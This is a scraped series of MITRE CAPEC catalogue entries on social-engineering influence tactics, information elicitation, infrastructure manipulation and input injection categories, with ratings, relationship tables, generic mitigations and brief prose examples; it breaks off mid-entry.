View customized information:

Description

Likelihood Of Attack

High

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	417	Influence Perception

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

The adversary must have the means and knowledge of how to communicate with the target in some manner.

Skills Required

[Level: Low]

The adversary requires strong inter-personal and communication skills.

Resources Required

None: No specialized resources are required to execute this type of attack.

Consequences

Scope	Impact	Likelihood
Confidentiality Integrity Availability	Other

Mitigations

An organization should provide regular, robust cybersecurity training to its employees to prevent social engineering attacks.

Example Instances

The adversary calls the target and announces that they are the head of IT at the target's company. The adversary goes on to say that there has been a technical issue and they need the target's login credentials for their account. By convincing the target of their authority, the adversary hopes the target will reveal the sensitive information.

Related Weaknesses

Social Engineering: CWE does not currently cover Social Engineering in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

References

[REF-348] "The Official Social Engineering Portal". Social-Engineer.org. Tick Tock Computers, LLC. <http://www.social-engineer.org>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, Methods_of_Attack, Related_Attack_Patterns, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Description Summary
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Example_Instances
Previous Entry Names
Change Date	Previous Entry Name
2017-08-04 (Version 2.11)	Target Influence via Perception of Authority

CAPEC-422: Influence Perception of Commitment and Consistency

Attack Pattern ID: 422

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	417	Influence Perception

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

The adversary must have the means and knowledge of how to communicate with the target in some manner.

Skills Required

[Level: Low]

The adversary requires strong inter-personal and communication skills.

Resources Required

None: No specialized resources are required to execute this type of attack.

Consequences

Scope	Impact	Likelihood
Confidentiality Integrity Availability	Other

Mitigations

An organization should provide regular, robust cybersecurity training to its employees to prevent social engineering attacks.

Individuals should avoid complying with suspicious requests.

Related Weaknesses

Social Engineering: CWE does not currently cover Social Engineering in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

References

[REF-348] "The Official Social Engineering Portal". Social-Engineer.org. Tick Tock Computers, LLC. <http://www.social-engineer.org>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Methods_of_Attack, References, Related_Attack_Patterns, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Mitigations
Previous Entry Names
Change Date	Previous Entry Name
2017-08-04 (Version 2.11)	Target Influence via Perception of Commitment and Consistency

CAPEC-424: Influence Perception of Consensus or Social Proof

Attack Pattern ID: 424

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	417	Influence Perception

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

The adversary must have the means and knowledge of how to communicate with the target in some manner.

Skills Required

[Level: Low]

The adversary requires strong inter-personal and communication skills.

Consequences

Scope	Impact	Likelihood
Confidentiality Integrity Availability	Other

Mitigations

An organization should provide regular, robust cybersecurity training to its employees to prevent social engineering attacks.

Related Weaknesses

Social Engineering: CWE does not currently cover Social Engineering in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

References

[REF-348] "The Official Social Engineering Portal". Social-Engineer.org. Tick Tock Computers, LLC. <http://www.social-engineer.org>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Methods_of_Attack, References, Related_Attack_Patterns, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit
Previous Entry Names
Change Date	Previous Entry Name
2017-08-04 (Version 2.11)	Target Influence via Perception of Consensus or Social Proof

CAPEC-423: Influence Perception of Liking

Attack Pattern ID: 423

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	417	Influence Perception

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

The adversary must have the means and knowledge of how to communicate with the target in some manner.The adversary must have knowledge of the types of things that the target likes.

Skills Required

[Level: Low]

The adversary requires strong inter-personal and communication skills.

Consequences

Scope	Impact	Likelihood
Confidentiality Integrity Availability	Other

Mitigations

An organization should provide regular, robust cybersecurity training to its employees to prevent social engineering attacks.

Related Weaknesses

Social Engineering: CWE does not currently cover Social Engineering in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

References

[REF-348] "The Official Social Engineering Portal". Social-Engineer.org. Tick Tock Computers, LLC. <http://www.social-engineer.org>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Methods_of_Attack, References, Related_Attack_Patterns, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Description
Previous Entry Names
Change Date	Previous Entry Name
2017-08-04 (Version 2.11)	Target Influence via Perception of Liking

CAPEC-418: Influence Perception of Reciprocation

Attack Pattern ID: 418

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	417	Influence Perception

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

The adversary must have the means and knowledge of how to communicate with the target in some manner.

Skills Required

[Level: Low]

The adversary requires strong inter-personal and communication skills.

Resources Required

None: No specialized resources are required to execute this type of attack.

Consequences

Scope	Impact	Likelihood
Confidentiality Integrity Availability	Other

Mitigations

An organization should provide regular, robust cybersecurity training to its employees to prevent social engineering attacks.

Example Instances

An adversary develops a relationship with the target to foster a feeling of obligation in them to perform a certain action or concede some information. A perception of obligation/concession means that the target feels they need to behave in some way or perform some sort of action due to being morally or legally bound to do so.

Related Weaknesses

Social Engineering: CWE does not currently cover Social Engineering in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

References

[REF-348] "The Official Social Engineering Portal". Social-Engineer.org. Tick Tock Computers, LLC. <http://www.social-engineer.org>.

[REF-360] "Social Engineering: The Art of Human Hacking". 2010. Wiley.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, Methods_of_Attack, References, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity
Previous Entry Names
Change Date	Previous Entry Name
2017-08-04 (Version 2.11)	Target Influence via Perception of Obligation

CAPEC-420: Influence Perception of Scarcity

Attack Pattern ID: 420

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	417	Influence Perception

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

The adversary must have the means and knowledge of how to communicate with the target in some manner.

Skills Required

[Level: Low]

The adversary requires strong inter-personal and communication skills.

Resources Required

None: No specialized resources are required to execute this type of attack.

Consequences

Scope	Impact	Likelihood
Confidentiality Integrity Availability	Other

Mitigations

An organization should provide regular, robust cybersecurity training to its employees to prevent social engineering attacks.

Example Instances

An adversary sends an email to a target about a limited-time opportunity to claim a considerable monetary reward. The email contains a link to a site which the adversary says is only active for a short time and to the first person to claim it. By convincing the user of the scarcity of the monetary reward, the adversary aims to persuade them to click on the malicious link in the email.

Related Weaknesses

Social Engineering: CWE does not currently cover Social Engineering in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

References

[REF-348] "The Official Social Engineering Portal". Social-Engineer.org. Tick Tock Computers, LLC. <http://www.social-engineer.org>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, Methods_of_Attack, References, Related_Attack_Patterns, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit
Previous Entry Names
Change Date	Previous Entry Name
2017-08-04 (Version 2.11)	Target Influence via Perception of Scarcity

CAPEC-426: Influence via Incentives

Attack Pattern ID: 426

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	416	Manipulate Human Behavior

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

The adversary must have the means and knowledge of how to communicate with the target in some manner.The adversary must have knowledge of the incentives that would influence the actions of the specific target.

Skills Required

[Level: Low]

The adversary requires strong inter-personal and communication skills.

Consequences

Scope	Impact	Likelihood
Confidentiality Integrity Availability	Other

Mitigations

An organization should provide regular, robust cybersecurity training to its employees to prevent social engineering attacks.

Related Weaknesses

Social Engineering: CWE does not currently cover Social Engineering in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

References

[REF-348] "The Official Social Engineering Portal". Social-Engineer.org. Tick Tock Computers, LLC. <http://www.social-engineer.org>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Methods_of_Attack, References, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit
Previous Entry Names
Change Date	Previous Entry Name
2017-08-04 (Version 2.11)	Target Influence via Manipulation of Incentives

CAPEC-428: Influence via Modes of Thinking

Attack Pattern ID: 428

Abstraction: Detailed

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	427	Influence via Psychological Principles

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions

Related Weaknesses

Social Engineering: CWE does not currently cover Social Engineering in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

References

[REF-348] "The Official Social Engineering Portal". Social-Engineer.org. Tick Tock Computers, LLC. <http://www.social-engineer.org>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Description Summary
Previous Entry Names
Change Date	Previous Entry Name
2017-08-04 (Version 2.11)	Target Influence via Modes of Thinking

CAPEC-427: Influence via Psychological Principles

Attack Pattern ID: 427

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	416	Manipulate Human Behavior
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	428	Influence via Modes of Thinking
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	429	Target Influence via Eye Cues
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	433	Target Influence via The Human Buffer Overflow
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	434	Target Influence via Interview and Interrogation
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	435	Target Influence via Instant Rapport

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

The adversary must have the means and knowledge of how to communicate with the target in some manner.

Skills Required

[Level: Low]

The adversary requires strong inter-personal and communication skills.

Consequences

Scope	Impact	Likelihood
Confidentiality Integrity Availability	Other

Mitigations

An organization should provide regular, robust cybersecurity training to its employees to prevent social engineering attacks.

Related Weaknesses

Social Engineering: CWE does not currently cover Social Engineering in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

References

[REF-348] "The Official Social Engineering Portal". Social-Engineer.org. Tick Tock Computers, LLC. <http://www.social-engineer.org>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Methods_of_Attack, References, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit
Previous Entry Names
Change Date	Previous Entry Name
2017-08-04 (Version 2.11)	Target Influence via Psychological Principles

CAPEC-410: Information Elicitation

Attack Pattern ID: 410

Abstraction: Meta

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	407	Pretexting

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Social Engineering
Mechanisms of Attack	Collect and Analyze Information

Related Weaknesses

Social Engineering: CWE does not currently cover Social Engineering in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

References

[REF-348] "The Official Social Engineering Portal". Social-Engineer.org. Tick Tock Computers, LLC. <http://www.social-engineer.org>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Description Summary
Previous Entry Names
Change Date	Previous Entry Name
2017-08-04 (Version 2.11)	Information Elicitation via Social Engineering

CAPEC-161: Infrastructure Manipulation

Attack Pattern ID: 161

Abstraction: Meta

View customized information:

Description

Typical Severity

High

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	141	Cache Poisoning
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	166	Force the System to Reset Values
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	268	Audit Log Manipulation
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	481	Contradictory Destinations in Traffic Routing Schemes
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	571	Block Logging to Central Repository
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	700	Network Boundary Bridging
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	664	Server Side Request Forgery

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware, Communications
Mechanisms of Attack	Manipulate System Resources

Prerequisites

The targeted client must access the site via infrastructure that the attacker has co-opted and must fail to adequately verify that the communication channel is operating correctly (e.g. by verifying that they are, in fact, connected to the site they intended.)

Resources Required

The attacker must be able to corrupt the infrastructure used by the client. For some variants of this attack, the attacker must be able to stand up their own services that mimic the services the targeted client intends to use.

Related Weaknesses

CWE-ID	Weakness Name
923	Improper Restriction of Communication Channel to Intended Endpoints

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Attack_Patterns
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Related_Weaknesses

CAPEC CATEGORY: Inject Unexpected Items

Category ID: 152

Summary

Membership

Nature	Type	ID	Name
MemberOf	View - A view in CAPEC represents a perspective with which one might look at the collection of attack patterns defined within CAPEC. There are three different types of views: graphs, explicit slices, and implicit slices.	1000	Mechanisms of Attack
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	137	Parameter Injection
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	175	Code Inclusion
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	240	Resource Injection
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	242	Code Injection
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	248	Command Injection
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	549	Local Execution of Code
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	586	Object Injection
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	594	Traffic Injection
HasMember	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	624	Hardware Fault Injection

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Relationships
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Description, Relationships
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Relationships
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Description
Previous Entry Names
Change Date	Previous Entry Name
2017-01-09 (Version 2.9)	Injection

CAPEC-153: Input Data Manipulation

Attack Pattern ID: 153

Abstraction: Meta

View customized information:

Description

Extended Description

For example, using a different character encoding might cause dangerous text to be treated as safe text. Alternatively, the attacker may use certain flags, such as file extensions, to make a target application believe that provided data should be handled using a certain interpreter when the data is not actually of the appropriate type. This can lead to bypassing protection mechanisms, forcing the target to use specific components for input processing, or otherwise causing the user's data to be handled differently than might otherwise be expected. This attack differs from Variable Manipulation in that Variable Manipulation attempts to subvert the target's processing through the value of the input while Input Data Manipulation seeks to control how the input is processed.

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	126	Path Traversal
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	128	Integer Attacks
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	267	Leverage Alternate Encoding

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate Data Structures

Prerequisites

